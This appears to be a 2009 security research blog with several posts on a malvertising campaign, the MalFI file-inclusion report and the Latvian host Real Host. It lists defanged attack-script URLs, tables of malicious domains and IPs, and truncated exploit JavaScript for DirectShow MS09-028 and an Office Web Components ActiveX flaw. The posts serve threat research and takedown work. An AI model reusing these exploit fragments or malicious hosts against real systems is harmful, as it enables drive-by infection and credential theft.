RFI Attacks

Suspected Attacks 146661

[Details]


Major Stealthy Malware Campaign – 711 Domains Taken Down

Starting sometime around November 6th, many attacks were observed coming from strangely named domains such as us.bf9.info, us.bp0.info, us.bn3.info, etc. The attackers employed some code splitting techniques to make their scripts more stealthy by moving suspicious shellcode from inside the primary exploit script to a secondary script. The attacks were being delivered through advertisements which also made investigating the source a pain. Performing some searches on the domains strangely did not yield any information from common sources such as malwareurl, malwaredomainlist, McAfee Site Adviser, etc.

To get to the root of the problem, Afilias (the company responsible for .info domains) and GoDaddy (the registrar) were involved to investigate. They quickly blocked the offending domains once it was clear they were hostile. What was very surprising was the end result, GoDaddy removed 711 domains that were affiliated with this attack!

Attack scripts:

hxxp://us.hn0.info/f/1/ie.html

http://www.virustotal.com/analisis/a53300db52ccf8a236348995c0480aed05fa4419d1eb5c471808a6ae2fd0d9b6-1259947372

hxxp://us.hn0.info/f/1/ff.html

http://www.virustotal.com/analisis/1d3778247739c072cb435e3b11a0592503cb71f6a03cce24af85ca20ba110f00-1259947360

hxxp://us.hn0.info/f/1/cosplay.swf
http://wepawet.iseclab.org/view.php?hash=8e2a2167a9f34c1c0b9d7ac456aff807&type=swf

Shellcode:
http://www.virustotal.com/analisis/71d15b19cc00d4ddb8cd9152f071671abe398fb6da7b0517b1d6a0e0c3e61995-1259948262

The domains:

FK0.INFO AC0.INFO KD8.INFO JZ5.INFO
FK6.INFO AE0.INFO KD9.INFO JZ6.INFO
FK7.INFO AE6.INFO CUUB.INFO JZ7.INFO
FK8.INFO AE9.INFO CXXB.INFO JZ8.INFO
FK9.INFO AF0.INFO DRRB.INFO KA0.INFO
FL0.INFO AF5.INFO DTTB.INFO KB0.INFO
FL7.INFO AF8.INFO DYYB.INFO KB8.INFO
FL8.INFO AF9.INFO GJGJ.INFO KC5.INFO
FM0.INFO AG0.INFO RFVT.INFO KC6.INFO
FM9.INFO AG7.INFO TGBY.INFO KC8.INFO
FN3.INFO AG8.INFO UJMI.INFO KD3.INFO
FN4.INFO AG9.INFO YHNU.INFO KD4.INFO
FN5.INFO AH0.INFO DT0.INFO KD7.INFO
FN6.INFO AH5.INFO DV0.INFO HX0.INFO
FN7.INFO AH7.INFO DV6.INFO HY2.INFO
FN8.INFO AI0.INFO DV7.INFO HY3.INFO
FO0.INFO AJ3.INFO DW0.INFO HY6.INFO
FO5.INFO AJ4.INFO DW9.INFO HY7.INFO
FO6.INFO AJ5.INFO DX6.INFO HZ0.INFO
FO7.INFO AJ7.INFO DX7.INFO HZ3.INFO
FP4.INFO AJ9.INFO DX8.INFO HZ4.INFO
FP5.INFO AK0.INFO DY2.INFO HZ5.INFO
FP9.INFO AN0.INFO DY5.INFO HZ7.INFO
FQ0.INFO AO0.INFO DZ4.INFO HZ8.INFO
FQ3.INFO AO3.INFO DZ5.INFO IA0.INFO
FQ4.INFO AO8.INFO EA0.INFO IB0.INFO
FQ6.INFO AP3.INFO EA2.INFO IB4.INFO
FQ7.INFO AP9.INFO EA4.INFO IB5.INFO
FR0.INFO AQ0.INFO EA5.INFO IB6.INFO
FS0.INFO AQ3.INFO EA6.INFO IB7.INFO
FS4.INFO AQ9.INFO EA7.INFO IB8.INFO
FS6.INFO AR0.INFO EA8.INFO IB9.INFO
FS7.INFO AT4.INFO EB0.INFO IC5.INFO
FT0.INFO AU0.INFO EB4.INFO IF4.INFO
FT5.INFO AW0.INFO ED0.INFO IF5.INFO
FT9.INFO AX0.INFO ED3.INFO IF6.INFO
FU0.INFO AX3.INFO EF2.INFO IF7.INFO
FU4.INFO AY0.INFO EH4.INFO IF8.INFO
FU8.INFO AZ5.INFO EH7.INFO IF9.INFO
FV4.INFO AZ6.INFO EI4.INFO IG5.INFO
FV6.INFO AZ7.INFO EI5.INFO IG6.INFO
FV7.INFO AZ8.INFO EI6.INFO IG9.INFO
FV8.INFO AZ9.INFO EI8.INFO IH0.INFO
FV9.INFO BC0.INFO EI9.INFO IH2.INFO
FW0.INFO BC6.INFO EK0.INFO IH3.INFO
FW5.INFO BC8.INFO EK2.INFO IH4.INFO
FW6.INFO BC9.INFO EK4.INFO IH5.INFO
FW8.INFO BD3.INFO EK5.INFO IH6.INFO
FW9.INFO BF0.INFO EK7.INFO IJ2.INFO
FY0.INFO BF4.INFO EL0.INFO IJ4.INFO
FY2.INFO BF6.INFO EL6.INFO IJ5.INFO
FY5.INFO BF8.INFO EM5.INFO IJ6.INFO
FY6.INFO BF9.INFO EM8.INFO IJ7.INFO
FZ0.INFO BG0.INFO EM9.INFO IK3.INFO
FZ3.INFO BH0.INFO EN8.INFO IK4.INFO
FZ4.INFO BH2.INFO EO0.INFO IK5.INFO
FZ5.INFO BI6.INFO EO3.INFO IK6.INFO
FZ7.INFO BI7.INFO EO5.INFO IK7.INFO
FZ8.INFO BJ4.INFO EO6.INFO IK8.INFO
GB0.INFO BK2.INFO EO7.INFO IK9.INFO
GC0.INFO BL0.INFO EO8.INFO IL0.INFO
GC6.INFO BL8.INFO EO9.INFO IL7.INFO
GC7.INFO BL9.INFO EP6.INFO IL8.INFO
GC8.INFO BM3.INFO EP7.INFO IO2.INFO
GC9.INFO BM5.INFO EP8.INFO IO3.INFO
GD0.INFO BM8.INFO EQ4.INFO IO5.INFO
GD4.INFO BN0.INFO EQ7.INFO IO6.INFO
GD5.INFO BN3.INFO ER9.INFO IQ9.INFO
GD6.INFO BN5.INFO ES7.INFO IR0.INFO
GD7.INFO BN7.INFO ES8.INFO IR6.INFO
GD8.INFO BN8.INFO ES9.INFO IR7.INFO
GF3.INFO BP0.INFO EU0.INFO IR9.INFO
GH4.INFO BP5.INFO EV9.INFO IU0.INFO
GH5.INFO BP6.INFO EW0.INFO IU2.INFO
GH6.INFO BP7.INFO EW4.INFO IV2.INFO
GH7.INFO BP8.INFO EY0.INFO IV4.INFO
GI0.INFO BQ0.INFO EZ0.INFO IV5.INFO
GI3.INFO BQ2.INFO EZ9.INFO IV6.INFO
GI6.INFO BQ3.INFO FA0.INFO IW0.INFO
GI8.INFO BQ4.INFO FC0.INFO IW2.INFO
GJ0.INFO BQ5.INFO FC5.INFO IW4.INFO
GJ7.INFO BQ6.INFO FC7.INFO IW5.INFO
GJ8.INFO BQ7.INFO FC9.INFO IW6.INFO
GJ9.INFO BQ8.INFO FD0.INFO IX4.INFO
GK0.INFO BQ9.INFO FD5.INFO IX5.INFO
GK3.INFO BR5.INFO FD8.INFO IX6.INFO
GK5.INFO BR6.INFO FD9.INFO IX7.INFO
GK6.INFO BR7.INFO FE0.INFO IY0.INFO
GK8.INFO BR9.INFO FE4.INFO IY2.INFO
GL3.INFO BS3.INFO FE7.INFO IY3.INFO
GL4.INFO BS5.INFO FG0.INFO IY4.INFO
GL9.INFO BT0.INFO FG3.INFO IY6.INFO
GM8.INFO BU0.INFO FG5.INFO IY8.INFO
GM9.INFO BU9.INFO FG8.INFO IY9.INFO
GN0.INFO BV0.INFO FH0.INFO IZ0.INFO
GN5.INFO BV2.INFO FH4.INFO IZ2.INFO
GN6.INFO BV5.INFO FH5.INFO IZ3.INFO
GN7.INFO BV7.INFO FH6.INFO IZ7.INFO
GN9.INFO BV8.INFO FH7.INFO IZ8.INFO
GP8.INFO BV9.INFO FH8.INFO IZ9.INFO
BX2.INFO WGREATDREAM.COM FH9.INFO JA0.INFO
BX7.INFO GP0.INFO FI4.INFO JB0.INFO
BX9.INFO GQ0.INFO FJ0.INFO JC2.INFO
BY5.INFO GQ2.INFO FJ2.INFO JC5.INFO
BZ9.INFO GQ3.INFO FJ3.INFO JC6.INFO
CB0.INFO GQ4.INFO FJ4.INFO JD2.INFO
CB6.INFO GQ5.INFO FJ5.INFO JD3.INFO
CE3.INFO GQ9.INFO FJ6.INFO JD4.INFO
CE7.INFO GR6.INFO FJ7.INFO KE2.INFO
CF0.INFO GR9.INFO FJ8.INFO KF3.INFO
CF3.INFO GS0.INFO FJ9.INFO KF4.INFO
CF4.INFO GS3.INFO FK2.INFO KF5.INFO
CF5.INFO GS6.INFO JD0.INFO KF7.INFO
CF6.INFO GS9.INFO JD6.INFO
CF7.INFO GU0.INFO JD7.INFO
CG3.INFO GU4.INFO JD9.INFO
CI0.INFO GV0.INFO JE2.INFO
CJ0.INFO GV2.INFO JE4.INFO
CJ3.INFO GV3.INFO JF0.INFO
CJ8.INFO GV4.INFO JF2.INFO
CL0.INFO GV5.INFO JF3.INFO
CL5.INFO GV9.INFO JG0.INFO
CL9.INFO GW0.INFO JG2.INFO
CM9.INFO GX0.INFO JG3.INFO
CO0.INFO GX2.INFO JG7.INFO
CP0.INFO GX4.INFO JG8.INFO
CP5.INFO GX5.INFO JG9.INFO
CP7.INFO GX6.INFO JH0.INFO
CQ0.INFO GY0.INFO JH4.INFO
CQ5.INFO GY2.INFO JH5.INFO
CQ7.INFO GY4.INFO JH7.INFO
CQ8.INFO GY5.INFO JI0.INFO
CQ9.INFO GY6.INFO JI1.INFO
CS0.INFO GY7.INFO JI2.INFO
CS7.INFO GY9.INFO JI7.INFO
CT0.INFO HB7.INFO JI9.INFO
CT6.INFO HB8.INFO JK7.INFO
CT8.INFO HC0.INFO JK8.INFO
CU3.INFO HC4.INFO JL2.INFO
CU4.INFO HC8.INFO JL3.INFO
CU5.INFO HD0.INFO JL4.INFO
CV0.INFO HE4.INFO JL5.INFO
CV8.INFO HE5.INFO JL7.INFO
CV9.INFO HE7.INFO JL9.INFO
CW0.INFO HF0.INFO JM0.INFO
CW4.INFO HF6.INFO JM3.INFO
CW5.INFO HF7.INFO JM6.INFO
CW8.INFO HF8.INFO JM7.INFO
CW9.INFO HF9.INFO JN2.INFO
CX0.INFO HG3.INFO JN7.INFO
CX5.INFO HG4.INFO JN8.INFO
CX6.INFO HG5.INFO JN9.INFO
CY2.INFO HG6.INFO JO0.INFO
CY3.INFO HG8.INFO JQ1.INFO
CY6.INFO HG9.INFO JQ2.INFO
CY7.INFO HJ2.INFO JQ3.INFO
CZ0.INFO HJ3.INFO JQ4.INFO
CZ7.INFO HJ5.INFO JQ5.INFO
CZ9.INFO HJ6.INFO JQ6.INFO
DA3.INFO HJ7.INFO JQ7.INFO
DA6.INFO HJ8.INFO JQ8.INFO
DA7.INFO HJ9.INFO JR0.INFO
DB5.INFO HK0.INFO JS3.INFO
DB6.INFO HK3.INFO JS4.INFO
DE4.INFO HK4.INFO JS5.INFO
DE5.INFO HL0.INFO JS8.INFO
DE6.INFO HL6.INFO JS9.INFO
DE8.INFO HL9.INFO JT0.INFO
DF5.INFO HM4.INFO JT3.INFO
DF6.INFO HN0.INFO JT4.INFO
DG0.INFO HN3.INFO JT5.INFO
DH3.INFO HN4.INFO JT9.INFO
DH9.INFO HN5.INFO JU0.INFO
DI0.INFO HN6.INFO JU2.INFO
DI3.INFO HN9.INFO JV0.INFO
DI4.INFO HO0.INFO JV3.INFO
DI8.INFO HP0.INFO JV4.INFO
DJ3.INFO HR6.INFO JV5.INFO
DJ7.INFO HS0.INFO JV6.INFO
DK0.INFO HS7.INFO JV8.INFO
DK5.INFO HS8.INFO JW4.INFO
DK7.INFO HS9.INFO JW7.INFO
DK8.INFO HT6.INFO JW8.INFO
DL0.INFO HU0.INFO JW9.INFO
DM0.INFO HU3.INFO JX1.INFO
DM4.INFO HU4.INFO JX2.INFO
DP0.INFO HU6.INFO JX3.INFO
DP3.INFO HU7.INFO JX5.INFO
DP6.INFO HV0.INFO JX8.INFO
DP7.INFO HW4.INFO JY0.INFO
DQ0.INFO HW6.INFO JY2.INFO
DQ2.INFO HW7.INFO JY4.INFO
DR0.INFO HW8.INFO JY5.INFO
DS7.INFO HX3.INFO JY6.INFO
DT3.INFO HX5.INFO JY7.INFO
DT5.INFO HX6.INFO JY9.INFO
DT6.INFO HX7.INFO JZ2.INFO
DT7.INFO HX9.INFO JZ3.INFO
DT8.INFO KD0.INFO JZ4.INFO
DT9.INFO
FK0.INFO AC0.INFO KD8.INFO
FK6.INFO AE0.INFO KD9.INFO
FK7.INFO AE6.INFO CUUB.INFO
FK8.INFO AE9.INFO CXXB.INFO
FK9.INFO AF0.INFO DRRB.INFO
FL0.INFO AF5.INFO DTTB.INFO
FL7.INFO AF8.INFO DYYB.INFO
FL8.INFO AF9.INFO GJGJ.INFO
FM0.INFO AG0.INFO RFVT.INFO
FM9.INFO AG7.INFO TGBY.INFO
FN3.INFO AG8.INFO UJMI.INFO
FN4.INFO AG9.INFO YHNU.INFO
FN5.INFO AH0.INFO DT0.INFO
FN6.INFO AH5.INFO DV0.INFO
FN7.INFO AH7.INFO DV6.INFO
FN8.INFO AI0.INFO DV7.INFO
FO0.INFO AJ3.INFO DW0.INFO
FO5.INFO AJ4.INFO DW9.INFO
FO6.INFO AJ5.INFO DX6.INFO
FO7.INFO AJ7.INFO DX7.INFO
FP4.INFO AJ9.INFO DX8.INFO
FP5.INFO AK0.INFO DY2.INFO
FP9.INFO AN0.INFO DY5.INFO
FQ0.INFO AO0.INFO DZ4.INFO
FQ3.INFO AO3.INFO DZ5.INFO
FQ4.INFO AO8.INFO EA0.INFO
FQ6.INFO AP3.INFO EA2.INFO
FQ7.INFO AP9.INFO EA4.INFO
FR0.INFO AQ0.INFO EA5.INFO
FS0.INFO AQ3.INFO EA6.INFO
FS4.INFO AQ9.INFO EA7.INFO
FS6.INFO AR0.INFO EA8.INFO
FS7.INFO AT4.INFO EB0.INFO
FT0.INFO AU0.INFO EB4.INFO
FT5.INFO AW0.INFO ED0.INFO
FT9.INFO AX0.INFO ED3.INFO
FU0.INFO AX3.INFO EF2.INFO
FU4.INFO AY0.INFO EH4.INFO
FU8.INFO AZ5.INFO EH7.INFO
FV4.INFO AZ6.INFO EI4.INFO
FV6.INFO AZ7.INFO EI5.INFO
FV7.INFO AZ8.INFO EI6.INFO
FV8.INFO AZ9.INFO EI8.INFO
FV9.INFO BC0.INFO EI9.INFO
FW0.INFO BC6.INFO EK0.INFO
FW5.INFO BC8.INFO EK2.INFO
FW6.INFO BC9.INFO EK4.INFO
FW8.INFO BD3.INFO EK5.INFO
FW9.INFO BF0.INFO EK7.INFO
FY0.INFO BF4.INFO EL0.INFO
FY2.INFO BF6.INFO EL6.INFO
FY5.INFO BF8.INFO EM5.INFO
FY6.INFO BF9.INFO EM8.INFO
FZ0.INFO BG0.INFO EM9.INFO
FZ3.INFO BH0.INFO EN8.INFO
FZ4.INFO BH2.INFO EO0.INFO
FZ5.INFO BI6.INFO EO3.INFO
FZ7.INFO BI7.INFO EO5.INFO
FZ8.INFO BJ4.INFO EO6.INFO
GB0.INFO BK2.INFO EO7.INFO
GC0.INFO BL0.INFO EO8.INFO
GC6.INFO BL8.INFO EO9.INFO
GC7.INFO BL9.INFO EP6.INFO
GC8.INFO BM3.INFO EP7.INFO
GC9.INFO BM5.INFO EP8.INFO
GD0.INFO BM8.INFO EQ4.INFO
GD4.INFO BN0.INFO EQ7.INFO
GD5.INFO BN3.INFO ER9.INFO
GD6.INFO BN5.INFO ES7.INFO
GD7.INFO BN7.INFO ES8.INFO
GD8.INFO BN8.INFO ES9.INFO
GF3.INFO BP0.INFO EU0.INFO
GH4.INFO BP5.INFO EV9.INFO
GH5.INFO BP6.INFO EW0.INFO
GH6.INFO BP7.INFO EW4.INFO
GH7.INFO BP8.INFO EY0.INFO
GI0.INFO BQ0.INFO EZ0.INFO
GI3.INFO BQ2.INFO EZ9.INFO
GI6.INFO BQ3.INFO FA0.INFO
GI8.INFO BQ4.INFO FC0.INFO
GJ0.INFO BQ5.INFO FC5.INFO
GJ7.INFO BQ6.INFO FC7.INFO
GJ8.INFO BQ7.INFO FC9.INFO
GJ9.INFO BQ8.INFO FD0.INFO
GK0.INFO BQ9.INFO FD5.INFO
GK3.INFO BR5.INFO FD8.INFO
GK5.INFO BR6.INFO FD9.INFO
GK6.INFO BR7.INFO FE0.INFO
GK8.INFO BR9.INFO FE4.INFO
GL3.INFO BS3.INFO FE7.INFO
GL4.INFO BS5.INFO FG0.INFO
GL9.INFO BT0.INFO FG3.INFO
GM8.INFO BU0.INFO FG5.INFO
GM9.INFO BU9.INFO FG8.INFO
GN0.INFO BV0.INFO FH0.INFO
GN5.INFO BV2.INFO FH4.INFO
GN6.INFO BV5.INFO FH5.INFO
GN7.INFO BV7.INFO FH6.INFO
GN9.INFO BV8.INFO FH7.INFO
GP8.INFO BV9.INFO FH8.INFO
BX2.INFO WGREATDREAM.COM FH9.INFO
BX7.INFO GP0.INFO FI4.INFO
BX9.INFO GQ0.INFO FJ0.INFO
BY5.INFO GQ2.INFO FJ2.INFO
BZ9.INFO GQ3.INFO FJ3.INFO
CB0.INFO GQ4.INFO FJ4.INFO
CB6.INFO GQ5.INFO FJ5.INFO
CE3.INFO GQ9.INFO FJ6.INFO
CE7.INFO GR6.INFO FJ7.INFO
CF0.INFO GR9.INFO FJ8.INFO
CF3.INFO GS0.INFO FJ9.INFO
CF4.INFO GS3.INFO FK2.INFO
CF5.INFO GS6.INFO JD0.INFO
CF6.INFO GS9.INFO JD6.INFO
CF7.INFO GU0.INFO JD7.INFO
CG3.INFO GU4.INFO JD9.INFO
CI0.INFO GV0.INFO JE2.INFO
CJ0.INFO GV2.INFO JE4.INFO
CJ3.INFO GV3.INFO JF0.INFO
CJ8.INFO GV4.INFO JF2.INFO
CL0.INFO GV5.INFO JF3.INFO
CL5.INFO GV9.INFO JG0.INFO
CL9.INFO GW0.INFO JG2.INFO
CM9.INFO GX0.INFO JG3.INFO
CO0.INFO GX2.INFO JG7.INFO
CP0.INFO GX4.INFO JG8.INFO
CP5.INFO GX5.INFO JG9.INFO
CP7.INFO GX6.INFO JH0.INFO
CQ0.INFO GY0.INFO JH4.INFO
CQ5.INFO GY2.INFO JH5.INFO
CQ7.INFO GY4.INFO JH7.INFO
CQ8.INFO GY5.INFO JI0.INFO
CQ9.INFO GY6.INFO JI1.INFO
CS0.INFO GY7.INFO JI2.INFO
CS7.INFO GY9.INFO JI7.INFO
CT0.INFO HB7.INFO JI9.INFO
CT6.INFO HB8.INFO JK7.INFO
CT8.INFO HC0.INFO JK8.INFO
CU3.INFO HC4.INFO JL2.INFO
CU4.INFO HC8.INFO JL3.INFO
CU5.INFO HD0.INFO JL4.INFO
CV0.INFO HE4.INFO JL5.INFO
CV8.INFO HE5.INFO JL7.INFO
CV9.INFO HE7.INFO JL9.INFO
CW0.INFO HF0.INFO JM0.INFO
CW4.INFO HF6.INFO JM3.INFO
CW5.INFO HF7.INFO JM6.INFO
CW8.INFO HF8.INFO JM7.INFO
CW9.INFO HF9.INFO JN2.INFO
CX0.INFO HG3.INFO JN7.INFO
CX5.INFO HG4.INFO JN8.INFO
CX6.INFO HG5.INFO JN9.INFO
CY2.INFO HG6.INFO JO0.INFO
CY3.INFO HG8.INFO JQ1.INFO
CY6.INFO HG9.INFO JQ2.INFO
CY7.INFO HJ2.INFO JQ3.INFO
CZ0.INFO HJ3.INFO JQ4.INFO
CZ7.INFO HJ5.INFO JQ5.INFO
CZ9.INFO HJ6.INFO JQ6.INFO
DA3.INFO HJ7.INFO JQ7.INFO
DA6.INFO HJ8.INFO JQ8.INFO
DA7.INFO HJ9.INFO JR0.INFO
DB5.INFO HK0.INFO JS3.INFO
DB6.INFO HK3.INFO JS4.INFO
DE4.INFO HK4.INFO JS5.INFO
DE5.INFO HL0.INFO JS8.INFO
DE6.INFO HL6.INFO JS9.INFO
DE8.INFO HL9.INFO JT0.INFO
DF5.INFO HM4.INFO JT3.INFO
DF6.INFO HN0.INFO JT4.INFO
DG0.INFO HN3.INFO JT5.INFO
DH3.INFO HN4.INFO JT9.INFO
DH9.INFO HN5.INFO JU0.INFO
DI0.INFO HN6.INFO JU2.INFO
DI3.INFO HN9.INFO JV0.INFO
DI4.INFO HO0.INFO JV3.INFO
DI8.INFO HP0.INFO JV4.INFO
DJ3.INFO HR6.INFO JV5.INFO
DJ7.INFO HS0.INFO JV6.INFO
DK0.INFO HS7.INFO JV8.INFO
DK5.INFO HS8.INFO JW4.INFO
DK7.INFO HS9.INFO JW7.INFO
DK8.INFO HT6.INFO JW8.INFO
DL0.INFO HU0.INFO JW9.INFO
DM0.INFO HU3.INFO JX1.INFO
DM4.INFO HU4.INFO JX2.INFO
DP0.INFO HU6.INFO JX3.INFO
DP3.INFO HU7.INFO JX5.INFO
DP6.INFO HV0.INFO JX8.INFO
DP7.INFO HW4.INFO JY0.INFO
DQ0.INFO HW6.INFO JY2.INFO
DQ2.INFO HW7.INFO JY4.INFO
DR0.INFO HW8.INFO JY5.INFO
DS7.INFO HX3.INFO JY6.INFO
DT3.INFO HX5.INFO JY7.INFO
DT5.INFO HX6.INFO JY9.INFO
DT6.INFO HX7.INFO JZ2.INFO
DT7.INFO HX9.INFO JZ3.INFO
DT8.INFO KD0.INFO JZ4.INFO
DT9.INFO
  • Share/Bookmark

Introducing MalFI – Another Report From HostExploit

I’m a few days late for posting this but the HostExploit team has produced another report, this time on an attack dubbed “MalFI” for malicious file inclusion. This encompasses remote file inclusion (RFI), local file inclusion (LFI) and Cross Server Attack (XSA). The report had been in the works for quite some time and while I was not a main author this time, Jart Armin and Scott Logan worked with me to interpret and use my honeypot data that I’ve been collecting over the last several months.

Rather than rehash the purpose for the report, here’s an excerpt from the abstract:

MALfi “A Silent Threat”

What is it all about, MALfi? A blended threat currently detected on around 350,000 websites &
Internet servers. One major purpose is to establish, “use once and throw away” disposable
botnets for spam, phishing, DDoS and exploits.
Full Report (public version) download PDF – hostexploit Download page = http://bit.ly/eoO4C

Abstract / Press Release

MALfi is a holistic and descriptive term applied to adequately describe the recent blended attack
utilized by hackers and cyber criminals to compromise websites and servers. This is
combination of RFI (remote file inclusion), LFI (local file inclusion), XSA (cross server attack),
and RCE (remote code execution).

Conservative estimates over recent months indicate around 350,000 affected websites and
servers worldwide. hostexploit and associated researchers have tracked 103,351 attacks,
involving 2,743 unique IP addresses, with 85 countries involved in RFI scanning and 911 ASNs
involved.

Check out the report for our research and findings. A more detailed version will also be made available to key members of the security and law enforcement communities.

  • Share/Bookmark

Recruiting Chinese Attackers

With all the talk about Chinese malware authors and groups of attackers supposedly sponsored by governments out there, I thought I would publish a find of mine from back in 2007. Excellent research has been done on this topic with one of the most interesting events being the discovery of GhostNet.

The following message was discovered in a HTML comment section inside a hostile script. I found the page hosting the script by searching for a string inside an ANI exploit on Google in May 2007.

天高云淡,正宜一马奔腾,青春年少,我自纵横驰骋,这是一个只承认强者的时代,然而学习正是赋予了我们作强者的资本,物竟天择,适者生存,只有不断的学习我们才不会被社所会淘汰,我们才会逐渐变强,珍惜你生命中的每一分钟无学习,你会发现平凡的你一样很优秀,当你在风烛残年的那一刻时,面对你的朋友,爱人,儿子,不会因碌碌无为而羞耻,不会因年华虚度而悔恨,你会发现当你,把你的你的青春变的更加劲直和充满活力的时候,曾经无奈与迷茫的你,现在是那样的精彩与辉煌黑域战盟一个,和平,博爱,互助,不会有任何的技术歧视的技术团体,诚心邀请您的加盟楚蓝枫QQ4998XXXXX

This translates to:

It is a clear day, suitable for horse gallops.  The youth is young; he can advance freely and quickly.

This is the era which appreciates only the strong, the survival of the fittest; yet study is the capital which empowers us to become strong. Only through continuous learning we will not be eliminated, we will become stronger and stronger. Cherish every minute of life with learning, you will find yourself as extraordinary as others. When you become old, in the face of your friends, wife, son, you will not feel shame and regret because you did not waste time when you were young; you will find yourself so wonderful when you contributed your vibrant youth into something meaningful, and changed yourself from once a helpless and confused you to someone brilliant.QQ4998XXXXX

Interesting message they were trying to get across isn’t it? :)

  • Share/Bookmark

SPAM Briefly Drops 38% Due To Real Host Shutdown

MessageLabs wrote a nice report summarizing key events from August and it turns out our work was more widely felt than believed. Apparently part of Cutwail’s C&C infrastructure resided inside Real Host’s network. When they got cut off, SPAM levels dropped but only briefly since there were more C&Cs elsewhere to pick up the slack.

Here’s an excerpt from the report, to bad they didn’t credit our work :)

“Real Host was disconnected by its upstream providers on 1 August 2009. The impact was immediately felt, as can be seen in Figure 1, where spam volumes dropped briefly by as much as 38% in the subsequent 48-hour period.

Much of this spam was linked to the Cutwail botnet, currently one of the largest botnets and responsible for approximately 15-20% of all spam. Its activity levels fell by as much as 90% when Real Host was taken offline, but quickly recovered in a matter of days.”

  • Share/Bookmark

Real Host now shutdown

Now that the report has hit mainstream media outlets, I am pleased to report that Real Host has been taken down. Score another one for the good guys!

The story was first published by the Financial Times of London

With follow up stories from:

Network World

The Inquirer

CIO Magazine

Information Security Magazine

Sunbelt Software

Computer World UK

And many more!

  • Share/Bookmark

Real Host, Latvia – RBN Resurgence or Clone

A couple of days ago I was investigating an attack that a reader submitted to me that was related to the recent nine ball attacks as reported by WebSense. (Part 1 | Part 2)

The attackers use the same techniques to exploit victims but this time have moved to new domains and updated their payloads. There are 2 payloads dropped on compromised hosts at the end of the attacks that steal banking credentials and send SPAM. These payloads are delivered by multiple exploits including  an unpatched 0day vulnerability and a previously unpatched one.

Directshow – MS09-028 (previously a 0day, patched recently)

function directshow()
{
var shellcode=unescape(”%uC033….

obj.data=’./directshow.php’;
obj.classid=’clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF’;

Microsoft Office Web Components (unpatched 0day)

function spreadsheet()
{
try
{
var objspread=new ActiveXObject(’OWC10.Spreadsheet’);
}

After conducting further research on 71speed.info and finding it hosted by Real Host Ltd of Latvia it quickly became apparent how bad this host is. A quick search leads to a blog written by Dynamoo where the activities of this host are first uncovered. Delving deeper into this provider  it is apparent that they are a major hub of cybercrime activity which we will discuss further. This post has been prepared in conjunction with Jart Armin from HostExploit.com. Jart will present a higher level view of Real Host’s activities in relation to other entities and most interestingly how they related to the former Russian Business Network (RBN).

It should be noted that many of these sites are no longer reachable due to swift efforts by registrar Directi.

Observed Hostile Activity:

  • Exploits including unpatched (or soon to be patched) 0days
  • Payloads to drop on victim PCs including: fake codecs, banking trojans, spambots, fake anti virus, downloaders and even a Mac trojan
  • Phishing sites
  • Moneymule recruitment sites
  • Botnet Command and Control servers
  • Hosting of cybercrime websites – Iframe programs
  • Distributing licensed software (Warez)

Real Host has 3 /28 IP blocks (48 IPs) that they get from Junik (AS8206), these are:

inetnum: 213.182.197.0 – 213.182.197.15
netname: Real_Host_NET3
descr: Real Host
country: LV
abuse-mailbox: abuseemaildhcp@gmail.com

inetnum: 213.182.197.224 – 213.182.197.239
netname: Real_Host_NET1
descr: Real Host
country: LV
abuse-mailbox: abuseemaildhcp@gmail.com

inetnum: 213.182.197.240 – 213.182.197.255
netname: Real_Host_NET2
descr: Real Host
country: LV
abuse-mailbox: abusemailhost@gmail.com

The first indication of suspicious activity is the use of gmail addresses as abuse contacts.

Next, here is data from my security tools showing attacks and the dates associated with them:

Date IP Domain URL Purpose
5/6/2009 213.182.197.230 update.dom11z.cn / Multiple Exploits
6/2/2009 213.182.197.227 test.corbsc.com /splt/getpdf.php Multiple Exploits
6/4/2009 213.182.197.229 2k90.cn /2/include/spl.php Multiple Exploits
6/5/2009 213.182.197.229 2k90.cn /2/include/spl.php Multiple Exploits
6/10/2009 213.182.197.237 downloadoemsoftware.com /exempl/include/spl.php Multiple Exploits
6/15/2009 213.182.197.237 downloadoemsoftware.com /exempl/include/spl.php Multiple Exploits
7/10/2009 213.182.197.237 noplit.ws /exempl/include/spl.php Multiple Exploits
7/10/2009 213.182.197.229 businessconsulting312.com /bus_trf/1/pdf.php Multiple Exploits
7/10/2009 213.182.197.229 businessconsulting312.com /bus_trf/1/pdf.php Multiple Exploits
5/6/2009 213.182.197.23 lieliteautobody.cn /load.php Payloads
5/6/2009 213.182.197.23 lieliteautobody.cn /load.php Payloads
6/2/2009 213.182.197.227 test.corbsc.com /splt/getexe.php Payloads
6/6/2009 213.182.197.5 virus-detect-soft.com /antivirus.exe Payloads
6/6/2009 213.182.197.5 virus-detect-soft.com /antivirus.exe Payloads
6/10/2009 213.182.197.237 downloadoemsoftware.com /exempl/load.php Payloads
7/18/2009 213.182.197.237 5fgh.ws /expli/update.php Payloads

A little manual investigation led me to the following:

IP Domain Purpose More Information
213.182.197.229 yourgoogleanalytics.us Money Mule Recruiting Link
213.182.197.229 barwellsgroup.cn Money Mule Recruiting Related to above
213.182.197.249 Vikd3jj-3.com Malware
213.182.197.251 2k90.cn malware
213.182.197.13 Mac-videos.com Mac Trojan Link
213.182.197.236 71speed.info Leads to Banking Trojan – Silent Banker & Spambot
213.182.197.8 bestxvids.info zlob Link
213.182.197.249 traffic-searches.cn botnet C&C Link
213.182.197.237 1gigabayt.com Zeus C&C Link
213.182.197.14 iframepartners.com iframe sellers
213.182.197.228 Chlenopopik.com Zeus C&C Link
213.182.197.14 Megavipsite.cn malware Link
213.182.197.20 Traffcount.cn malware Link
213.182.197.229 Newskyag.com Money Mule Recruiting Link
Zeus C&C Link
213.182.197.235 Traffic-exchange.ru Part of iframe redirection service Link
213.182.197.10 vlkontacte.ru Russian Social Network Phish
213.182.197.251 Botnet.su Zeus C&C Link

The domain I found most amusing was botnet.su, the attackers clearly aren’t trying to hide their motives on this one! This domain was previously used by the RBN along with NewskyAG and others. More on this link can be found at hostexploit.com.

Zeus seems to be one of the most common threats being hosted from Real Host’s network. According to recent information released by Damballa, Zeus is the #1 botnet in the US with an estimated 3.6 million PCs compromised.

To begin, let’s look at the money mule sites the Barwells Group and NewskyAG, here is an excerpt from the link included above:

BarwellsGroup

“During the trial period (1 month), you will be paid 2000 USD per month
while working on average 3 hours per day, Monday-Friday, plus 5
commission from every transactions or task received and processed. The
salary will be sent in the form of wire transfer directly to your
account. After the trial period your base pay salary will go up to
3,500USD per month, plus 5 commission.”

Clearly this is a money mule recruitment program. Sounds pretty good for 3 hours work per day, maybe I should quit my day job!

NewskyAG

